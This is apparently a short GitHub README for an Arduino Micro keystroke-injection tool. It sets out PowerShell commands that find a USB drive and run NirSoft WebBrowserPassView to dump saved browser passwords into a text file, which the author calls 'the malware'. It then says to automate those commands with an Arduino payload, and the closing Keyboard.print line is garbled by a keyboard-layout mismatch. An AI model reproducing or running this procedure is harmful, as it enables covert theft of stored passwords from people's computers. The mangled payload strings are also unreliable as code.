
this will allow you to use arduino micro as an key_stroke_injection_tool !!

Primary LanguageC

First you have to download the password grabber software the following web site or copy it from the repository :

link to Nirsoft web site : 

Next you have to put the password recovery file into a usb //

Plug the USB drive and copy the executable inside it //

open powershell and type //
$usbPath  = Get-WMIOBject Win32_Volume | ? { $_.Label -eq 'DRIVE_NAME' } | select name 

and then type :

 cd $usbPath.name 

and then run the malware :

./WebBrowserPassView /stext pass.txt 

this powershell command will save the passwords in a text file //

//equivlent to <>ZebBrozserPqssViez >stext pqss<txt ###if you have a french layout ..need to work on that !! 

// now you have to automate the execution using arduino the .ino  file is available in the repository  


code for arduino English layout payload





Keyboard.print("]usbPqth = Get6Z;IOBject Zin#@Volu;e ");
